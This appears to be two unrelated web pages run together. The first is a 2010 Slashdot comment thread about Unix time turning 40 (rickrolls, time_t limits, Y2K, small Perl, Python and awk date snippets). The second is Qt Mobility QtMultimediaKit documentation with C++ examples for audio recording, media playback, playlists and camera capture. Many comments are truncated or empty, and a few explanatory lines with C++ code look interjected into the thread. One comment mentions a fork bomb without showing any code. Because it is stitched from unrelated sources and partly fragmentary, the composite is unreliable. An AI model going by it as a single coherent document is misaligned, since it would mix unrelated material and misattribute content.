Beware what? Seeing in the new year with Rick Astley seems like a pretty good thing to me. Then again, I am easily amused!
Re: (Score:2)
What's wrong with Rick Astley? I've heard worse songs.
It's not April 1 yet (Score:3, Informative)
Did you even check it?
Re: (Score:2)
Re: (Score:2)
The first link took me to a Rick Astley youtube video. Thankfully I was browsing with the sound muted.
Re: (Score:2)
Either the link has been changed, or you're hitting the absinthe a little hard this New Year's.
Re: (Score:2)
See below. It seems there is a bit of messing around with localtime in a flash application on the page. It can't show the number of seconds to 2010 during 2010.
Re: (Score:2)
The first link took me to a Rick Astley youtube video. Thankfully I was browsing with the sound muted.
It's the millennium bug!
Re: (Score:1)
Thankfully my browser sound doesn't work while I'm listening to music. Thanks Ubuntu.
Only a rickroll after midnight (Score:5, Informative)
Re: (Score:2)
Okay its 1524 on the 1st for me. I got the video.
Re: (Score:2)
test
Re: (Score:2)
Re: (Score:2)
I looked after midnight (10/01/01 03:30am local). I got a white page flash up, with some numbers I think, and then youtube. It appears to be controlled by their newYear.swf. Makes you wonder, was there anything more nefarious in that? What a lovely way to start the new year. 10,000 Slashdotters infected with a nice fresh trojan.
Re: (Score:1)
Re:It's not April 1 yet (Score:5, Funny)
You should install the RickBlockPlus [functionalperfection.com] browser addon to prevent this sort of thing happening.
Re: (Score:1)
Re: .
Unix epoch? (Score:3, Interesting)
Why didn't we restart it at 2000 amidst the Y2K mess?
Re:Unix epoch? (Score:5, Interesting)
Putting it in 1970 is a pain. VMS at least put their zero date in 1858, where it is less likely to conflict with real dates. Of course, VMS had 64-bit support from the word go. Rebasing time_t would have created a horrible mess. Better to start again with a proper date type.
Re: (Score:2)
Why is putting it in 1970 a pain? Because time_t is signed, that gives us the range of 1901 December 13 20:45:52 UTC to 2038 January 19 03:14:07 UTC.
That's 136 or so years from a 32-bit value.
Re: (Score:2)
Because time_t is signed, that gives us the range of 1901 December 13 20:45:52 UTC to 2038 January 19 03:14:07 UTC.
Damn - if only those 6th Century monks had thought of that we wouldn't now be arguing over whether today is the start of a new decade!
Re: (Score:1)
Re: (Score:2)
Isn't the sign bit only used to indicate error? ((time_t)-1) isn't a valid time but perhaps some other negative values are.
Sorry, what are you talking about?
$ echo -1 |awk '{print strftime("%c",$1,0)}'
Wed 31 Dec 1969 04:59:59 PM MST
$ echo -1 |awk '{print strftime("%c",$1,1)}'
Wed 31 Dec 1969 11:59:59 PM GMT
$ echo -1 |awk '{print strftime("%s",$1,0)}'
-1
Seems to work fine for me.
Re:Unix epoch? (Score:5, Funny)
Why didn't we restart it at 2000 amidst the Y2K mess?
You have a promising career in middle management ahead of you!
Re: (Score:2, Insightful)
No, no, middle management does all the work. Such a decision is usually done by top management.
Re: (Score:1, Informative)
Re: (Score:2)
Why was the epoch chosen to be 00:00:00 UTC on 1 January 1970?
I know the epoch was changed around a bit because early versions of the Unix time system functioned at rates greater than 1 Hz, and hence would run out of room in the 32-bit space really really fast. I'm not sure why that particular date was the one they settled on; hopefully someone else can fill in.
Why didn't we restart it at 2000 amidst the Y2K mess?
I'm not 100% on this, but I believe the Y2K mess didn't affect Unix-y systems at all. The way Unix time works, if you're not familiar, is that it just counts the seconds after the epoch. Whether the year is.
Yes, assuming well-behaved programs. But it is a fact that Y2K doesn't affect this particular interface at.
Remember all of the Perl-based CGI wishing you a Happy New Year on January 1, 19100? I have old books in a box somewhere from *1997* with sample code telling users to print "19" then append the year value. It affect
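For the record, the "19100" bug comes from tm_year being defined as years since 1900; this small C++ sketch (purely illustrative, assuming <ctime>) shows the broken and the correct way to build the year:
#include <cstdio>
#include <ctime>

int main() {
    std::time_t now = std::time(nullptr);
    std::tm *t = std::localtime(&now);
    std::printf("Broken:  19%d\n", t->tm_year);       // the year 2000 comes out as 19100
    std::printf("Correct: %d\n", 1900 + t->tm_year);  // add 1900, don't concatenate "19"
    return 0;
}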
Damn you Slashdot! (Score:5, Funny)
Re: (Score:1)
"So x" is so 200x.
Re: (Score:1)
Re: (Score:1)
It's actually a rollover joke.
Over the hill? (Score:2)
I turn 45 this year you insensitive clod! Passing the top of the hill just means I am gaining momentum for the next climb, anyway.
BTW why does the summary point to a page which returns
(54) Connection reset by peer
Maybe the server is over the hill.
Re: (Score:2)
I don't know what special relationship with mortality you have, Sisyphus, but when most of us crest the hill, it's a smooth coast to the bottom.
Re: (Score:2)
I don't know what special relationship with mortality you have
I am a hacker. Many things are possible.
Re: (Score:2)
Re: (Score:3, Insightful)
I reject your reality and substitute my own.
Re:Over the hill? (Score:5, Interesting)
Re: (Score:3, Informative)
Perl version? (Score:2)
Cool. But would someone please translate this obfuscated Ruby into some readable Perl?
Re: (Score:2)
import time
for i in range(0,31):
    print "0"*(30-i) + "1" + "0"*i + " " + time.strftime("%a %b %d %H:%M:%S +0000 %Y",time.gmtime(2**i))
for i in reversed(range(0,31)):
    print "1"*(31-i) + "0"*i + " " + time.strftime("%a %b %d %H:%M:%S +0000 %Y",time.gmtime(2**31 - 2**i))
print "$"
Re: (Score:2)
Indeed, that was much more readable. And helped writing this Perl version, despite the Python trap (for a Python-illiterate) of "range(0,31)" apparently meaning "from 0 to 30":
for (0..30) {
    print "0"x(30-$_), 1, "0"x$_, " ", scalar gmtime(2**$_), "\n";
}
for (reverse 0..29) {
    print "1"x(31-$_), "0"x$_, " ", scalar gmtime(2**31 - 2**$_), "\n";
}
Now, maybe someone can condense it into a smarter one-liner, with some clever use of printf and/or pack/unpack.
Re: (Score:2)
import time
for i in range(0,61): print str((i>30)*1) * abs(i-30) + "1" + "0" * (30 - abs(i-30)) + " " + time.strftime("%a %b %d %H:%M:%S +0000 %Y",time.gmtime((2**(30 - abs(i-30))) * ((i <= 30) * 2 - 1) + 2 ** 31 * (i > 30)))
Re: (Score:2)
And here is the one-liner Perl version, using printf's %b:
$ perl -e 'for (0..30) {printf "%031b %s\n", 2**$_, scalar gmtime(2**$_)} for (reverse 0..29) {printf "%031b %s\n", 2**31-2**$_, scalar gmtime(2**31-2**$_)}'
Beware of parent's bomb! (Score:2)
Beware! The parent's code is the well-known Bash fork bomb [cyberciti.biz].
Windows (Score:2, Funny)
The Windows clock starts the second Gates stiffed IBM out of the DOS market.
Why is there a link to this guy's blog? (Score:3, Interesting)
Why is there a link in the summary to some guy's blog which says exactly what I've pasted above? I mean really, just put the information in the summary without the link....
Re: (Score:3, Insightful)
More important, why is the guy with the blog still wearing a face mullet, in 2010?
And have you ever met an "independent game producer" with such a neatly trimmed beard?
Re: (Score:2)
I use the day as my "birthday" on public websites in tribute.
Wow. He is hardcore!
Some of us ... (Score:2)
That's funny,... (Score:5, Funny)
My clock says today is Setting Orange, Day 73 of the Aftermath in the Year of Our Lady of Discord 3175.
Re: (Score:1)
I want a copy of your clock. Where might such a thing be acquired?
Note: I am too drunk to use Google properly at this juncture.
Re: (Score:2)
Telecommando is obviously a time traveller.
Re: (Score:1)
...oops
;-)
Re: (Score:3, Informative)
Re: (Score:2)
Not a clock, it's a calendar [wikipedia.org].
Problem with this (Score:2)
This isn't really a valid birthday unless time() was actually compiled and run for the first time immediately after midnight on January 1, 1970. I mean, c'mon, are we supposed to also be celebrating the 190th birthday of perl's localtime()?
Re: (Score:2)
... er, make that 110th - sorry about that. Darn Slashdot and its lack of an edit function...
Re:Problem with this (Score:5, Insightful)
I don't know about you, but I'm ready to drink to that.
My wife and I opened a bottle of champagne a few hours ago, and she's fallen asleep after two glasses, the lightweight. I had a double espresso with my pecan pie and now I'm ready to friggin' rawk!
After I submit this, I'm gonna go show some Borderlands weaklings who's boss. Either that or finish the champagne and go watch the fireworks from my rooftop, naked. It's -2 degrees F outside though, so maybe I ought to pull out the thermal merkin first. I mean, subzero temperatures, nudity and high blood-alcohol level - what could possibly go wrong?
Re: (Score:2)
go watch the fireworks from my rooftop, naked.
I had similar plans but then our 38 degree C [wolframalpha.com] day turned into really serious thunder and lightening so I decided to give the naked roof standing a miss. The roof is steel and quite well grounded.
Re: (Score:2)
Yeah, the fireworks will be all washed out from the lightening anyway. Was the lightening caused by lightning, perhaps? Meteors? Or was it just fog and ordinary street-lamps?
Flash? Seriously? (Score:3, Insightful)
Just for showing the epoch time?
Re: (Score:1, Funny)
It makes sense when the time hits midnight.
This is not true (Score:5, Informative)
The epoch starts at January 1st, 1970, but the system call itself was not around in 1970 [wikipedia.org].
Am I the only one? (Score:3, Insightful)
Who is almost exactly as old as *nix time?
Re: (Score:2)
Some of us are already "on the other side".
No I don't mean Windows. %-P
Rgds
Damon
Re: (Score:2)
Is %-P a legal printf() format?
Re: (Score:2)
When you're older than UNIX, you get to choose...
It's also how you look when trying to read the sprintf() man page on a mobile device.
Rgds
Damon
Re: (Score:2)
I am also "as old as time".
I turned 40 on 9-9-9.
Re: (Score:2)
Hey, we're birthday-brothers. I turned 22 on 999.
Hmm... (Score:2)
Apparently Slashdot's version of time_t had a year 2010 problem!
Happy new year anyway!
date +%s (Score:1)
On a *nix system, type "date +%s" to see the number of seconds since the Unix epoch started.
Re: (Score:2)
That is, on GNU systems. Not all Unix systems support %s, and it isn't in the standard, either.
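Where %s isn't available, a few lines of C++ give the same count (a sketch, assuming C++11; any language with a time() wrapper works equally well):
#include <cstdio>
#include <ctime>

int main() {
    // std::time() returns seconds since the Unix epoch on POSIX systems
    std::printf("%lld\n", static_cast<long long>(std::time(nullptr)));
    return 0;
}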
Re: (Score:2)
Never gonna do that again
Never gonna do what again?
a) Give you up
b) Let you down
c) Run around and desert you
d) All of the above
http://tech.slashdot.org/story/10/01/01/024210/Raise-a-Glass-mdash-Time2-Turns-40-Tonight
QtMultimediaKit provides a set of APIs that allow the developer to play, record and manage a collection of media content. It is dependent on the QtMultimedia module. QtMultimediaKit is the recommended API to build multimedia applications using Qt. The Phonon API is no longer recommended.
Unlike the other APIs in QtMobility, the Multimedia API is not in the QtMobility namespace.
This API delivers an easy to use interface to multimedia functions. The developer can use the API to display an image, or a video, record sound or play a multimedia stream.
There are several benefits this API brings to Qt. Firstly, the developer can now implement fundamental multimedia functions with minimal code, mostly because they are already implemented. There is also a great deal of flexibility with the media source and the generated multimedia. The source file does not need to be local to the device; it could be streamed from a remote location and identified by a URL. Finally, many different codecs are supported 'out of the box'.
The supplied examples give a good idea of how easy the API is to use. When the supporting user interface code is ignored, we can see that functionality is immediately available with minimal effort.
The Audio Recorder example is a good introduction to the basic use of the API. We will use snippets from this example to illustrate how to use the API to quickly build functionality.
The first step is to demonstrate recording audio to a file. When recording from an audio source there are a number of things we may want to control beyond the essential user interface. We may want a particular encoding of the file, MP3 or Ogg Vorbis for instance, or select a different input source. The user may modify the bitrate, number of channels, quality and sample rate. Here the example will only modify the codec and the source device, since they are essential.
To begin, the developer sets up a source and a recorder object. A QAudioCaptureSource object is created and used to initialize a QMediaRecorder object. The output file name is then set for the QMediaRecorder object.
audiosource = new QAudioCaptureSource;
capture = new QMediaRecorder(audiosource);
capture->setOutputLocation(QUrl("test.raw"));
A list of devices is needed so that an input can be selected in the user interface
for(int i = 0; i < audiosource->deviceCount(); i++)
    deviceBox->addItem(audiosource->name(i));
and a list of the supported codecs for the user to select a codec,
QStringList codecs = capture->supportedAudioCodecs();
for(int i = 0; i < codecs.count(); i++)
    codecsBox->addItem(codecs.at(i));
To set the selected device or codec just use the index of the device or codec by calling the setter in audiosource or capture as appropriate, for example,
audiosource->setSelectedDevice(i);
...
capture->setAudioCodec(codecIdx);
Now start recording by using the record() function from the new QMediaRecorder object
capture->record();
And stop recording by calling the matching function stop() in QMediaRecorder.
capture->stop();
How then would this audio file be played? The QMediaPlayer class will be used as a generic player. Since the player can play both video and audio files the interface will be more complex, but for now the example will concentrate on the audio aspect.
Playing the file is simple: create a player object, pass in the filename, set the volume or other parameters, then play. Not forgetting that the code will need to be hooked up to the user interface.
QMediaPlayer *player = new QMediaPlayer;
...
player->setMedia(QUrl::fromLocalFile("test.raw"));
player->setVolume(50);
player->play();
The filename does not have to be a local file. It could be a URL to a remote resource. Also by using the QMediaPlaylist class from this API we can play a list of local or remote files. The QMediaPlaylist class supports constructing, managing and playing playlists.
player = new QMediaPlayer;
playlist = new QMediaPlaylist(player);
playlist->addMedia(QUrl(""));
playlist->addMedia(QUrl(""));
...
playlist->setCurrentPosition(1);
player->play();
To manipulate the playlist there are the usual management functions (which are in fact slots): previous, next, setCurrentPosition and shuffle. Playlists can be built, saved and loaded using the API.
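As a hedged sketch of how those slots might be wired up in practice (the button objects here are hypothetical, invented only for illustration):
connect(nextButton,     SIGNAL(clicked()), playlist, SLOT(next()));
connect(previousButton, SIGNAL(clicked()), playlist, SLOT(previous()));
connect(shuffleButton,  SIGNAL(clicked()), playlist, SLOT(shuffle()));
// jump straight to the third entry in the playlist
playlist->setCurrentPosition(2);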
Continuing with the example discussed for an Audio recorder/player, we can use this to show how to play video files with little change to the code.
Moving from audio to video requires few changes in the sample code. To play a video playlist the code can be changed to include another new QtMobility Project class: QVideoWidget. This class enables control of a video resource with signals and slots for the control of brightness, contrast, hue, saturation and full screen mode.
player = new QMediaPlayer;
playlist = new QMediaPlaylist(player);
playlist->addMedia(QUrl(""));
playlist->addMedia(QUrl(""));
...
widget = new QVideoWidget(player);
widget->show();
playlist->setCurrentPosition(1);
player->play();
The Player example does things a bit differently to our sample code. Instead of using a QVideoWidget object directly, the Player example has a VideoWidget class that inherits from QVideoWidget. This means that functions can be added to provide functions such as full screen display, either on a double click or on a particular keypress.
videoWidget = new VideoWidget(this);
player->setVideoOutput(videoWidget);
playlistModel = new PlaylistModel(this);
playlistModel->setPlaylist(playlist);
Creating still images and video.
In order to capture an image we need to create a QCamera object and use it to initialize a QVideoWidget, so we can see where the camera is pointing - a viewfinder. The camera object is also used to initialize a new QCameraImageCapture object, imageCapture. All that is then needed is to start the camera, lock it so that the settings are not changed while the image capture occurs, capture the image, and finally unlock the camera ready for the next photo.
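A minimal sketch of that sequence, assembled from the description above (the variable names, the still-image capture mode constant and the exact lock/unlock calls are assumptions, not copied from the original page):
camera = new QCamera;
viewfinder = new QVideoWidget(camera);    // viewfinder initialized with the camera, as described above
viewfinder->show();

imageCapture = new QCameraImageCapture(camera);
camera->setCaptureMode(QCamera::CaptureStillImage);   // still-image counterpart of CaptureVideo used below
camera->start();

// lock the camera settings, capture, then unlock ready for the next shot
camera->searchAndLock();
imageCapture->capture();
camera->unlock();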
Note: Alternatively, we could have used a QGraphicsVideoItem as a viewfinder.
Previously we saw code that allowed the capture of a still image. Recording video requires the use of a QMediaRecorder object and a QAudioCaptureSource for sound.
To record video we need a camera object, as before, a media recorder and a viewfinder object. The media recorder object will need to be initialized.
camera = new QCamera;
mediaRecorder = new QMediaRecorder(camera);
camera->setCaptureMode(QCamera::CaptureVideo);
camera->start();
// on shutter button pressed
mediaRecorder->record();
Recording is then controlled through the record(), pause(), stop() and setMuted() slots in QMediaRecorder.
When the camera is in video mode, as decided by the application, pressing the shutter button locks the camera as before, but the record() function in QMediaRecorder is used instead.
Focusing is managed by the classes QCameraFocus and QCameraFocusControl. FocusPointMode supports face recognition, center focus and a custom focus mode where the focus point can be specified.
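As a rough illustration, selecting a custom focus point could look like the following sketch (the method and enum names are assumptions based on the class names above, not quoted from the original page):
QCameraFocus *focus = camera->focus();
focus->setFocusPointMode(QCameraFocus::FocusPointCustom);
focus->setCustomFocusPoint(QPointF(0.25, 0.75));   // point given in relative viewfinder coordinates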
Various operations such as image capture and auto focusing occur asynchronously. These operations can often be cancelled by the start of a new operation, as long as this is supported by the backend. For image capture, the operation can be cancelled by calling cancelCapture(). For auto-focus, auto-exposure or white balance, cancellation can be done by calling unlock(QCamera::LockFocus).
The Camera Example shows how to use the QtMultimediaKit API to quickly write a camera application in C++.
The QML Camera Example demonstrates still image capture and controls using the QML plugin. Video recording is not currently available.
The QML Video Example demonstrates the various manipulations (move; resize; rotate; change aspect ratio) which can be applied to QML Video and Camera items.
It also shows how native code can be combined with QML to implement more advanced functionality - in this case, C++ code is used to calculate the QML frame rate and (on Symbian) the graphics memory consumption; these metrics are rendered in QML as semi-transparent items overlaid on the video content.
The QML Video Shader Effects Example shows how the ShaderEffectItem element can be used to apply postprocessing effects, expressed in GLSL, to QML Video and Camera items.
It re-uses the frame rate and memory consumption display code used by the QML Video Example.
Finally, this application demonstrates the use of different top-level QML files to handle different physical screen sizes. On small-screen devices, menus are by default hidden, and only appear when summoned by a gesture. Large-screen devices show a more traditional layout in which menus are displayed around the video content pane.
For developers wishing to access some platform specific settings, or to port the Qt Multimedia APIs to a new platform or technology, see Multimedia Backend Development.
On Symbian, the QVideoRendererControl class may provide video frames in one of two forms:
Which of these paths is available depends on the version of the Symbian platform, and on the source of the video data:
Where multiple paths are available, the default can be overridden by setting the "_q_eglRenderingAllowed" property on the QMediaService object. If this property is true and the "EGL" path is available, it is used. Otherwise the "software" path is used.
// create a camera whose viewfinder may render via EGL
camera = new QCamera;
camera->service()->setProperty("_q_eglRenderingAllowed", true);
Note that, for rendering video frames to the screen, the QGraphicsVideoItem implementation uses the most efficient route available (which is never the "software" path). Selection of the correct rendering path is done automatically and is transparent to the client.
http://doc.troll.no/qtmobility-1.2/multimedia.html